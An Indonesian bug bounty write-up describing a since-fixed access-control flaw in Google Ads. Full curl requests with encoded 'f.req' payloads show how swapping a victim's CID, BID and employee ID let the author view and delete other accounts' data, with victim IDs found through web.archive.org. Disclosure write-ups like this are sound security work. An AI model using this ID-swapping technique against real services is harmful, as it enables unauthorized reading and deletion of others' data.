BOOK THIS SPACE FOR AD
ARTICLE ADAssalamualaikum hai, saya Akbar dari Surabaya disini saya akan menjelaskan POC (Proof of concept) yang saya temukan dan sudah di fixed oleh pihak terkait. Sesuai dengan judulnya, penyerang dapat melihat data korban + menghapusnya
Google Ads (sebelumnya dikenal sebagai Google AdWords) adalah platform periklanan online yang disediakan oleh Google. Hal ini memungkinkan pengiklan untuk menampilkan iklan bisnis mereka di berbagai situs web Google dan jaringan periklanan Google. Google Ads menggunakan model periklanan bayar per klik (PPC), yang berarti pengiklan hanya membayar bila pengguna mengklik iklan mereka.
Disini saya mengubah Parameter CID dan BID korban di “f.req=”
Lalu bagaimana cara saya mendapatkan CID dan BID korban? saya mencarinya di “web.archive.org/search” sebagai contoh dibawah:
Lalu konversikan ke format encoded seperti dibawah anda bisa menggunakan encoded online atau apapun
f.req=%5B%5B%5B%22gBU0of%22%2C%22%5B%5Bcid-Victim%2Cbid-Victim%2C9999999999%5D%2C%5Bnull%2Cnull%2Ctrue%2C41%2C%5B%5B%5C%22null%5C%22%2C%5C%22null.%5C%22%2Cnull%5D%5D%2Cnull%2C%5C%22testtestpentester%5C%22%2Cnull%2Cnull%2Cnull%2C%5B%5C%22id%5C%22%5D%2C%5B%5B%5B%5C%22null%5C%22%2Cnull%2Cnull%2C%5B1%2Cnull%2Cnull%2Cnull%2C%5B%5D%5D%2Cnull%2C1683847984862%2C2%2C8%5D%5D%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5B%5C%22xcat%3Aservice_area_business_beauty_school%5C%22%2C%5B%5D%5D%5D%2C%5C%22null%5C%22%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5D%2C%5B%5D%5D%2Cnull%2C1%2Cnull%2C%5B%5B19%5D%5D%2C%5C%22null%5C%22%5D%22%2Cnull%2C%22generic%22%5D%5D%5D-H 'authority: ads.google.com' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0' \
-H 'accept-language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Referer: https://ads.google.com'\
-H 'X-Same-Domain: 1' \
-H 'x-goog-ext-253122638-jspb: [mcid]' \
-H 'x-goog-ext-268714167-jspb: [euid]' \
-H 'content-type: application/x-www-form-urlencoded' \
-H 'Content-Length: 950' \
-H 'Origin: https://ads.google.com' \
-H 'Connection: close' \
-H $'cookie: ' \
--data-raw 'f.req=%5B%5B%5B%22gBU0of%22%2C%22%5B%5Bcid-Victim%2Cbid-Victim%2C9999999999%5D%2C%5Bnull%2Cnull%2Ctrue%2C41%2C%5B%5B%5C%22null%5C%22%2C%5C%22null.%5C%22%2Cnull%5D%5D%2Cnull%2C%5C%22testtestpentester%5C%22%2Cnull%2Cnull%2Cnull%2C%5B%5C%22id%5C%22%5D%2C%5B%5B%5B%5C%22null%5C%22%2Cnull%2Cnull%2C%5B1%2Cnull%2Cnull%2Cnull%2C%5B%5D%5D%2Cnull%2C1683847984862%2C2%2C8%5D%5D%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5B%5C%22xcat%3Aservice_area_business_beauty_school%5C%22%2C%5B%5D%5D%5D%2C%5C%22null%5C%22%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5D%2C%5B%5D%5D%2Cnull%2C1%2Cnull%2C%5B%5B19%5D%5D%2C%5C%22null%5C%22%5D%22%2Cnull%2C%22generic%22%5D%5D%5D' \
--compressed
Disclaimer!, data hasil HTTP request digambar bukanlah data asli korban, melainkan data palsu yang saya buat. Lalu saya mengirim Permintaan HTTP untuk mendapatkan data dibawah ini:
dan menghapus data korban beserta POC-nya:
Saya mengedit semua parameter “f.req=” menjadi “null” yang mana akan menghapus seluruh data, dan disini saya berhasil menghapus data Pekerja dan Karyawan dari jarak jauh
bagaimana cara saya menghapus?dalam "f.req=" ada sebuah employee-id, bernama: 637395
yakni bilangan yang terdiri dari 6 digit
1. 108264
2. 115691
3. 637395
4. 591176
5. 115696 (Success Delete Worker and Employee data remotely)
curl 'https://ads.google.com/_/GhsUi/data/batchexecute?' \
-H 'Accept: */*' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Connection: close' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: https://ads.google.com' \
-H 'Referer: https://ads.google.com/' \
-H 'Sec-Fetch-Dest: empty' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0' \
-H 'X-Same-Domain: 1' \
-H 'x-goog-ext-268714167-jspb: [euid]' \
-H $'Cookie: ' \
--data-raw 'f.req=%5b%5b%5b%22gBU0of%22%2c%22%5b%5b5199090248%2c2793546442%2c9999999999%5d%2c%5bnull%2cnull%2cnull%2cnull%2c%5b%5b%5c%22null%5c%22%2c%5c%22%2cnull%5c%22%2cnull%5d%5d%2cnull%2c%5c%22%2cnull%5c%22%2cnull%2cnull%2cnull%2c%5b%5d%2c%5b%5b%5b%5c%22null%5c%22%2cnull%2cnull%2c%5b1%2cnull%2cnull%2cnull%2c%5b%5d%5d%2cnull%2cnull%2cnull%2cnull%5d%5d%5d%2cnull%2cnull%2cnull%2c%5b%5bnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5c%22null%5c%22%5d%5d%2cnull%2cnull%2c115696%2cnull%2cnull%2c%5b%5b%5c%22%2cnull%5c%22%2c%5b%5d%5d%5d%2c%5c%22%2cnull%5c%22%2cnull%2cnull%2c%5b%5d%2cnull%2cnull%2cnull%2c%5b%5d%2c%5b%5d%2c%5b%5d%5d%2cnull%2c2%5d%22%2cnull%2c%22generic%22%5d%5d%5d&at=AOYElloakLAkXmxGnRMrVv5XHFa2%3a1684572807023' \
--compressed
Berhasil menghapus data korban!
Timeline :12:48 | 12.05.2023 - TRIAGED
05:51 | 19.05.2023 - ACCEPTED (P3-S3)
15:27 | 21.05.2023 - TRIAGED (Add Poc)
19:35 | 15.06.2023 - ACCEPTED (P2-S2)
07:55 | 25.07.2023 - $x.xxx
21:58 | 16.09.2023 - FIXED
Terima kasih semua! saya harap informasi ini bisa bermanfaat bagi kalian semua karena saya biasa menyimpan catatan saya sendiri, maka dari itu sayang kalau ilmu tidak dibagikan. Tetap belajar dan jangan putus asa dalam bencari bug para bug hunter
-chears! langs